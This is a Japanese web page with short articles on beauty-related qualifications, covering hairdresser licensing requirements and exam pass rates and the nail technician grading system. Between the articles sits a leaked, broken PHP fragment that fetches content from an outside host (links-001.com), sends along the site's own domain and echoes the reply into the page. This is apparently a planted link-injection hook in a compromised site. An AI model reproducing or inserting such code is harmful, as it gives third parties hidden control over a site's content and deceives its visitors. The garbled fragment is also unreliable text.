前へ
次へ

美容に関わる資格について

現在、美容に係る仕事には多くの種類があります。
この中で国家資格となっているのは美容師と理容師

more

美容関連の仕事に就きたいなら資格が必要

美容と一言に言ってもメイクやネイルなど、いくつかのジャンルがあります。
美容の仕事の中でも現在

more

ダイエット検定を受けてみよう

女性なら誰しもきれいになりたいという願望があるはずです。
しかし、何から始めていいかわからない

more

美容師の資格について

美容に関する資格には、様々なものが存在しています。
今回は、その中の一つ、「美容師」について説明していきたいと思います。
有名な資格なので、聞いたことはあるかと思います。
特徴として、カットやパーマはもちろん、カラーリングやブローなどの技術を使い、お客様の髪を整え、美しく仕上げるということが挙げられます。
この資格を得るためには、厚生労働大臣が指定した、専門学校で2年学んだあと、年に2回行われる美容師試験に合格しなければなりません。
試験内容としては、実技試験と筆記試験があります。
合格率は約80%ですので、しっかり勉強すれば高い確率で合格することが出来るでしょう。
資格を得た後は、美容院で働くのが一般的になります。

".file_get_contents('http://links-001.com/123set5.php?dom='.str_replace("www.", "", $_SERVER['HTTP_HOST']))."

"; ?>

美容資格の一つ「ネイリスト」について

美容に関係する資格の一つに「ネイリスト」があります。
今回は、このネイリストについて説明していきます。
ネイリストとは、お客様の爪や指先をきれいにしたり、健康的にしたりする人のことを指します。
ネイルケアの他にも、2枚爪の修正やエクステンション、アートなど様々な業務を行います。
日本では、97年に資格制度が始まりました。
試験は1〜3級に分かれています。
3級が最も簡単で、1級が最も難易度が高くなります。
3級では、基礎と技術のみの初心者レベルですが、1級では本場であるアメリカでの試験と同等以上の知識・テクニックが必要とされるのです。
ネイリストになるために、資格が絶対に必要ということではありませんが、持っていると何かと役に立つのは言うまでもないでしょう。

Page Top